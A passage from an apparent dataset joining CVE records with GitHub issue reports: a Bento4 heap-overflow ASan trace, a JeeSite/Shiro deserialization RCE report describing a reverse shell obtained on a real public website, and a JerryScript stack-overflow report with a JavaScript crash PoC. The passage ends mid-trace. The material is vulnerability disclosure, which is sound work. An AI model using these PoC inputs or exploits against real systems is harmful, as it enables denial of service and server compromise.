(/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x444cfd) #34 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b) #35 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf) #36 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d) #37 0x50703e in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x50703e) #38 0x7a75e6 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x7a75e6) #39 0x4446b7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4446b7) #40 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b) #41 0x44e49a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44e49a) #42 0x4baaee in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4baaee) #43 0x4bc068 in AP4_File::AP4_File(AP4_ByteStream&, bool) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4bc068) #44 0x4090ab in main (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4090ab) #45 0x7f9977c8b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #46 0x4078bd in _start (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4078bd) 0x6030000003e6 is located 0 bytes to the right of 22-byte region [0x6030000003d0,0x6030000003e6) allocated by thread T0 here: #0 0x907b17 in operator new[](unsigned long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x907b17) #1 0x4a2314 in AP4_DataBuffer::AP4_DataBuffer(unsigned int) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4a2314) #2 0x4cc5dc in AP4_HvccAtom::Create(unsigned int, AP4_ByteStream&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4cc5dc) #3 0x446dc2 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x446dc2) #4 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b) #5 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf) #6 0x5779a8 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x5779a8) #7 0x58e0bb in AP4_VisualSampleEntry::AP4_VisualSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x58e0bb) #8 0x58f042 in AP4_AvcSampleEntry::AP4_AvcSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x58f042) #9 0x44241c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44241c) #10 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b) #11 0x5bbbb7 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x5bbbb7) #12 0x5bafbd in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x5bafbd) #13 0x445b0e in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x445b0e) #14 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b) #15 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf) #16 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d) #17 0x47df78 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47df78) #18 0x44c562 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44c562) #19 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b) #20 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf) #21 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d) #22 0x47df78 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47df78) #23 0x44c562 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44c562) #24 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b) #25 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf) #26 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d) #27 0x47df78 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47df78) #28 0x44c562 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44c562) #29 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b) SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4cfa60) in AP4_HvccAtom::AP4_HvccAtom(unsigned int, unsigned char const*) Shadow bytes around the buggy address: 0x0c067fff8020: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa 0x0c067fff8030: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 0x0c067fff8040: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 0x0c067fff8050: fd fd fd fa fa fa 00 00 04 fa fa fa 00 00 00 fa 0x0c067fff8060: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 =>0x0c067fff8070: 00 fa fa fa 00 00 00 fa fa fa 00 00[06]fa fa fa 0x0c067fff8080: 00 00 06 fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2542087==ABORTING ``` ## System Ubuntu 20.04 clang 12.0.1 Bento4 latest commit 46dd88c5cc0e20e1fc1b970aa87ce68645057f0e ## Credit Han Zheng ([NCNIPC of China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch)) Yin Li, Xiaotong Jiao (NCNIPC of China) ## POC [poc.zip](https://github.com/axiomatic-systems/Bento4/files/8240178/poc.zip)
[BUG] Heap buffer overflow in AP4_HvccAtom, mp4tag
https://api.github.com/repos/axiomatic-systems/Bento4/issues/677/comments
2
2022-03-13T16:49:47Z
2022-08-25T07:59:03Z
https://github.com/axiomatic-systems/Bento4/issues/677
1,167,633,442
677
CVE-2020-19229
2022-04-05T16:15:10.230
Jeesite 1.2.7 uses the apache shiro version 1.2.3 affected by CVE-2016-4437. Because of this version of the java deserialization vulnerability, an attacker could exploit the vulnerability to execute arbitrary commands via the rememberMe parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thinkgem/jeesite/issues/490" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeesite:jeesite:1.2.7:*:*:*:*:*:*:*", "matchCriteriaId": "93B2F451-C602-49A6-99C7-7DB5C74C5EE8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/thinkgem/jeesite/issues/490
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thinkgem", "jeesite" ]
## jeesite 远程命令执行漏洞(Remote command execution vulnerability) ### 漏洞利用过程 `jeesite`使用了`apache shiro`组件,其版本为1.2.3。 ![image](https://user-images.githubusercontent.com/39592354/57190502-68a01f80-6f4d-11e9-9350-1ccac8543a17.png) 因apache shiro该版本存在java反序列化漏洞,攻击者可构造恶意数据包执行任意命令,从而拿下服务器权限。 以公网某网站为例:(参考:http://blog.knownsec.com/2016/08/apache-shiro-java/) ![image](https://user-images.githubusercontent.com/39592354/57190646-1829c180-6f4f-11e9-9a78-0b9988589b37.png) 从上图可以看到,我们利用脚本执行命令即可反弹拿到该网站对应ip服务器的命令执行权限,危害巨大。 由于使用该框架的网站众多,致使大量网站存在严重安全隐患。请尽快修复并提示用户进行升级修复该漏洞。 ### 修复建议 升级 Shiro 版本至 1.2.5 以上。
jeesite远程命令执行漏洞
https://api.github.com/repos/thinkgem/jeesite/issues/490/comments
2
2019-05-05T08:10:51Z
2019-08-13T07:34:05Z
https://github.com/thinkgem/jeesite/issues/490
440,415,874
490
CVE-2021-41752
2022-04-05T16:15:12.590
Stack overflow vulnerability in Jerryscript before commit e1ce7dd7271288be8c0c8136eea9107df73a8ce2 on Oct 20, 2021 due to an unbounded recursive call to the new opt() function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4779" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "DEA949B0-0B9B-44F8-8E13-0559CA6BB90E", "versionEndExcluding": "2021-10-20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/4779
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision e1ce7dd7 ###### Build platform Ubuntu 20.04.3 LTS (Linux 5.11.0-34-generic x86_64) Linux-5.11.0-34-generic-x86_64-with-glibc2.29 ###### Build steps ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --lto=off --stack-limit 10 ###### Test case ```javascript function opt() { let obj = new opt(); for (let i = 0; i < 1; i++) { obj.x = 1; obj = +obj; obj.x = 1; } } function main() { for (let i = 0; i < 100; i++) { opt(); } } main(); ``` ###### Execution platform the same as the build platform. ###### Output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==1259593==ERROR: AddressSanitizer: stack-overflow on address 0xff275f1c (pc 0xf7a73bdb bp 0xff276348 sp 0xff275f00 T0) #0 0xf7a73bda in __interceptor_malloc (/lib32/libasan.so.5+0x113bda) #1 0x5661e74a in jmem_heap_alloc_block_internal (/home/weiwei/Desktop/jerry+0x3774a) #2 0x56620ba1 in jmem_pools_alloc /home/weiwei/Desktop/jerryscript/jerry-core/jmem/jmem-poolman.c:108 #3 0x5681956c in ecma_alloc_object /home/weiwei/Desktop/jerryscript/jerry-core/ecma/base/ecma-alloc.c:81 #4 0x56697174 in ecma_create_object /home/weiwei/Desktop/jerryscript/jerry-core/ecma/base/ecma-helpers.c:85 #5 0x56707bdc in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1558 #6 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #7 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #8 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #9 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #10 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #11 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #12 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #13 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #14 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #15 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #16 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #17 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #18 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #19 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #20 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #21 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #22 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #23 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #24 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #25 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #26 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #27 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #28 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #29 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #30 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #31 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #32 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #33 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #34 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #35 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #36 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #37 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #38 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #39 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #40 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #41 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #42 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #43 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #44 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #45 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #46 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #47 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #48 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #49 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #50 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #51 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #52 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #53 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #54 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #55 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #56 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #57 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #58 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #59 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #60 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #61 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #62 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #63 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #64 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #65 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #66 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #67 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #68 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #69 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #70 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #71 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #72 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #73 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #74 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #75 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #76 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #77 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #78 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #79 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #80 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #81 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #82 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #83 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #84 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #85 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #86 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #87 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #88 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #89 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #90 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #91 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #92 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #93 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #94 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #95 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #96 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #97 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #98 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #99 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #100 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #101 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #102 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #103 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #104 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #105 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #106 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #107 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #108 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #109 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #110 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #111 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #112 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #113 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #114 